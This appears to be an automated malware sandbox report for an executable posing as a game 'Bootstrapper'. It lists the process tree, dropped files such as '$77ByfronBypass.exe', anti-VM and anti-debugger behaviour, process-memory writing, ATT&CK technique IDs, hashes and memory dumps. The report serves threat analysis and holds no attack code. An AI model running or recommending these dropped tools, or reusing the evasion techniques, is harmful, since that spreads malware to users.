C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2044

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2584

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2996

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3076

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3260
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV3_1_protected.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV3_1_protected.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Users\Admin\AppData\Local\Temp\$77ByfronBypass.exe
    "C:\Users\Admin\AppData\Local\Temp\$77ByfronBypass.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2816 -s 1680
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4728
- - C:\Users\Admin\AppData\Local\Temp\$77SolaraInstaller2.1.exe
    "C:\Users\Admin\AppData\Local\Temp\$77SolaraInstaller2.1.exe"
    3⤵
    - Executes dropped EXE
    PID:400
- - C:\Users\Admin\AppData\Local\Temp\$77BootstrapperFixer.exe
    "C:\Users\Admin\AppData\Local\Temp\$77BootstrapperFixer.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3448

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3992

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4040

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:2864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1956

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2728

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3472

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:1124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x21c,0x7ffbe1e6f208,0x7ffbe1e6f214,0x7ffbe1e6f220
  2⤵
  PID:2444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:11
  2⤵
  PID:544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4060,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=4072 /prefetch:14
  2⤵
  PID:72
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=4588,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:14
  2⤵
  PID:1264

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:464

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3380

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5020

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2156

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3760
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 444 -p 2816 -ip 2816
  2⤵
  PID:2976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2dd71f46-5fb9-4e6e-8fc7-cd86adcafc4d.tmp.csv

Filesize
38KB

MD5
93d7ab2748ae3cc9701cabf945097406

SHA1
b0c4764681339dd4f98f6fb724b241c9d8ec030c

SHA256
c516d1cd1e45ffb74338603c171f21801f422daf9ce7a9c54b1de319aa62a4cd

SHA512
5495885162a424cc117768bba27282a8fb1415179f756c8374003e6a1659c947fedfafdf3ffd51e1d2021f47812276f114d0b16defa71591fdb000bba5c6867c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.e5cd6f3a-c536-4c78-b8fd-b5cf7b2c1978.tmp.txt

Filesize
13KB

MD5
41e8101f02dac8c4cd1ae2c9c9fd4b3f

SHA1
c0edeb63952936bd9287689b141632bf021245fd

SHA256
7cf3e0890fb425bdb36f1af1e8d6ba6d9a3fba6e05e1de5059c0e4ab57262709

SHA512
2debc5fcdcc1f1a96fe46ae23e0b0de38a9a2e4aca72c1b91a3f25c58ab1bcda724dc68a43e1c4d35c646be3d175a4bd3a7c1c9321c3abfdcc308579b94c2196

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
33887b59355abd51c3c18ed1fe10741f

SHA1
43a4f3e4e2584cccf1cf1ab94d8421cbbad7026c

SHA256
ced068fa42932ce9796f8acf37793d7ec81d846501959ae5b797242c2866cb2d

SHA512
d1f36290e55f84e30694049ee24898d0d87a001ccff6369bbe83beec5b554660569f898f62de32c6433813bf45fcc45e463eed53ca0b728851bd39283d0a9229

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77BootstrapperFixer.exe

Filesize
163KB

MD5
75b6e5f5b44ad6476ccf8a562c37eb98

SHA1
5d5b8f9882f027c09744fd965a01caaa24135ca6

SHA256
bdd9fcfe7b2ff3b6d7dc45e83d377561732483a431bb598163ffceec7b393719

SHA512
81adcf4b3ecf256aa77d970a08d66e2ccaa60a798e5f3b377634685f6ae72b56607061e34911593b30e66a0b4a53c2e8e82f16c3ddc19ddf3574043e26898a64

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77ByfronBypass.exe

Filesize
181KB

MD5
a44b1b24c3afdbedd2d298f29de89564

SHA1
5f48db46cd46a0a6ff9636387e5c72603bfc7a90

SHA256
0ce1598a7531fee3a5ae7aefd4bd27ff2bef358ac0442d0ddfcc4a1685669afb

SHA512
25f4ba124cd70da610da2f4596379895db81b978ed166915bb5092c756452d98410265b7de29eb51d0de259775bb0994eee130ae30108f5fcd7d7c579d4c771e

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77SolaraInstaller2.1.exe

Filesize
2.9MB

MD5
f227cdfd423b3cc03bb69c49babf4da3

SHA1
3db5a97d9b0f2545e7ba97026af6c28512200441

SHA256
cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

SHA512
b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_nd2vtcjm.p1a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/392-130-0x000001D1486F0000-0x000001D14871A000-memory.dmp

Filesize
168KB

Download
memory/392-129-0x000001D1486F0000-0x000001D14871A000-memory.dmp

Filesize
168KB

Download
memory/392-131-0x000001D1486F0000-0x000001D14871A000-memory.dmp

Filesize
168KB

Download
memory/392-132-0x000001D1486F0000-0x000001D14871A000-memory.dmp

Filesize
168KB

Download
memory/392-128-0x000001D1486F0000-0x000001D14871A000-memory.dmp

Filesize
168KB

Download
memory/392-123-0x000001D1486F0000-0x000001D14871A000-memory.dmp

Filesize
168KB

Download
memory/400-61-0x0000027BCEDC0000-0x0000027BCEDE6000-memory.dmp

Filesize
152KB

Download
memory/400-66-0x0000027BCEE40000-0x0000027BCEE48000-memory.dmp

Filesize
32KB

Download
memory/400-43-0x0000027BB3ED0000-0x0000027BB41B2000-memory.dmp

Filesize
2.9MB

Download
memory/400-46-0x0000027BB4600000-0x0000027BB4610000-memory.dmp

Filesize
64KB

Download
memory/400-47-0x0000027BCE7B0000-0x0000027BCE7B8000-memory.dmp

Filesize
32KB

Download
memory/400-62-0x0000027BCEE00000-0x0000027BCEE08000-memory.dmp

Filesize
32KB

Download
memory/400-65-0x0000027BCEC70000-0x0000027BCEC7A000-memory.dmp

Filesize
40KB

Download
memory/400-58-0x0000027BCEC50000-0x0000027BCEC5E000-memory.dmp

Filesize
56KB

Download
memory/400-60-0x0000027BCEC60000-0x0000027BCEC6A000-memory.dmp

Filesize
40KB

Download
memory/400-59-0x0000027BCECC0000-0x0000027BCEDC0000-memory.dmp

Filesize
1024KB

Download
memory/400-57-0x0000027BCEC80000-0x0000027BCECB8000-memory.dmp

Filesize
224KB

Download
memory/400-64-0x0000027BCEDF0000-0x0000027BCEDFA000-memory.dmp

Filesize
40KB

Download
memory/400-63-0x0000027BCEE10000-0x0000027BCEE26000-memory.dmp

Filesize
88KB

Download
memory/640-74-0x000001ED4EE00000-0x000001ED4EE09000-memory.dmp

Filesize
36KB

Download
memory/640-91-0x000001ED4EE40000-0x000001ED4EE6A000-memory.dmp

Filesize
168KB

Download
memory/640-78-0x000001ED4EE00000-0x000001ED4EE09000-memory.dmp

Filesize
36KB

Download
memory/640-79-0x000001ED4EE00000-0x000001ED4EE09000-memory.dmp

Filesize
36KB

Download
memory/640-81-0x000001ED4EE10000-0x000001ED4EE34000-memory.dmp

Filesize
144KB

Download
memory/640-82-0x000001ED4EE40000-0x000001ED4EE6A000-memory.dmp

Filesize
168KB

Download
memory/640-83-0x000001ED4EE40000-0x000001ED4EE6A000-memory.dmp

Filesize
168KB

Download
memory/640-88-0x000001ED4EE40000-0x000001ED4EE6A000-memory.dmp

Filesize
168KB

Download
memory/640-73-0x000001ED4EE00000-0x000001ED4EE09000-memory.dmp

Filesize
36KB

Download
memory/640-89-0x000001ED4EE40000-0x000001ED4EE6A000-memory.dmp

Filesize
168KB

Download
memory/640-72-0x000001ED4E5F0000-0x000001ED4E5F5000-memory.dmp

Filesize
20KB

Download
memory/640-77-0x000001ED4EE00000-0x000001ED4EE09000-memory.dmp

Filesize
36KB

Download
memory/640-90-0x000001ED4EE40000-0x000001ED4EE6A000-memory.dmp

Filesize
168KB

Download
memory/700-95-0x0000024B0F860000-0x0000024B0F88A000-memory.dmp

Filesize
168KB

Download
memory/700-104-0x0000024B0F860000-0x0000024B0F88A000-memory.dmp

Filesize
168KB

Download
memory/700-105-0x00007FFBCA250000-0x00007FFBCA260000-memory.dmp

Filesize
64KB

Download
memory/700-100-0x0000024B0F860000-0x0000024B0F88A000-memory.dmp

Filesize
168KB

Download
memory/700-101-0x0000024B0F860000-0x0000024B0F88A000-memory.dmp

Filesize
168KB

Download
memory/700-102-0x0000024B0F860000-0x0000024B0F88A000-memory.dmp

Filesize
168KB

Download
memory/700-103-0x0000024B0F860000-0x0000024B0F88A000-memory.dmp

Filesize
168KB

Download
memory/984-117-0x0000021C9FF80000-0x0000021C9FFAA000-memory.dmp

Filesize
168KB

Download
memory/984-119-0x00007FFBCA250000-0x00007FFBCA260000-memory.dmp

Filesize
64KB

Download
memory/984-116-0x0000021C9FF80000-0x0000021C9FFAA000-memory.dmp

Filesize
168KB

Download
memory/984-115-0x0000021C9FF80000-0x0000021C9FFAA000-memory.dmp

Filesize
168KB

Download
memory/984-114-0x0000021C9FF80000-0x0000021C9FFAA000-memory.dmp

Filesize
168KB

Download
memory/984-109-0x0000021C9FF80000-0x0000021C9FFAA000-memory.dmp

Filesize
168KB

Download
memory/984-118-0x0000021C9FF80000-0x0000021C9FFAA000-memory.dmp

Filesize
168KB

Download
memory/2680-48-0x0000022DA6380000-0x0000022DA63A2000-memory.dmp

Filesize
136KB

Download
memory/2680-71-0x00007FFC08260000-0x00007FFC0831D000-memory.dmp

Filesize
756KB

Download
memory/2680-68-0x0000022DA6860000-0x0000022DA688A000-memory.dmp

Filesize
168KB

Download
memory/2680-69-0x00007FFC0A1C0000-0x00007FFC0A3C9000-memory.dmp

Filesize
2.0MB

Download
memory/2680-70-0x00007FFC07A80000-0x00007FFC07DF4000-memory.dmp

Filesize
3.5MB

Download
memory/2816-21-0x0000000000DC0000-0x0000000000DF4000-memory.dmp

Filesize
208KB

Download
memory/2816-20-0x00007FFBE9013000-0x00007FFBE9015000-memory.dmp

Filesize
8KB

Download
memory/2984-8-0x00000000057B0000-0x000000000584C000-memory.dmp

Filesize
624KB

Download
memory/2984-0-0x0000000000400000-0x00000000011F6000-memory.dmp

Filesize
14.0MB

Download
memory/2984-4-0x0000000077770000-0x0000000077860000-memory.dmp

Filesize
960KB

Download
memory/2984-7-0x0000000000400000-0x00000000011F6000-memory.dmp

Filesize
14.0MB

Download
memory/2984-6-0x0000000000400000-0x00000000011F6000-memory.dmp

Filesize
14.0MB

Download
memory/2984-44-0x0000000000400000-0x00000000011F6000-memory.dmp

Filesize
14.0MB

Download
memory/2984-45-0x0000000077770000-0x0000000077860000-memory.dmp

Filesize
960KB

Download
memory/2984-3-0x0000000077770000-0x0000000077860000-memory.dmp

Filesize
960KB

Download
memory/2984-2-0x0000000077770000-0x0000000077860000-memory.dmp

Filesize
960KB

Download
memory/2984-1-0x0000000077786000-0x0000000077787000-memory.dmp

Filesize
4KB

Download